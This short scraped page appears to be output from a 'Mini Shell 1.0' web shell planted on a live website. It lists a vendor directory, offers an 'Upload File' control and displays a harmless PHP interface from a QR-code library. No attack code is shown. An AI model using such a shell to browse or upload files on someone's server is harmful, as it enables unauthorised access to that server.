HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /proc/self/cwd/vendor/simplesoftwareio/simple-qrcode/src/DataTypes/
Upload File :
Current File : //proc/self/cwd/vendor/simplesoftwareio/simple-qrcode/src/DataTypes/DataTypeInterface.php
<?php

namespace SimpleSoftwareIO\QrCode\DataTypes;

interface DataTypeInterface
{
    /**
     * Generates the DataType Object and sets all of its properties.
     */
    public function create(array $arguments);

    /**
     * Returns the correct QrCode format.
     *
     * @return string
     */
    public function __toString();
}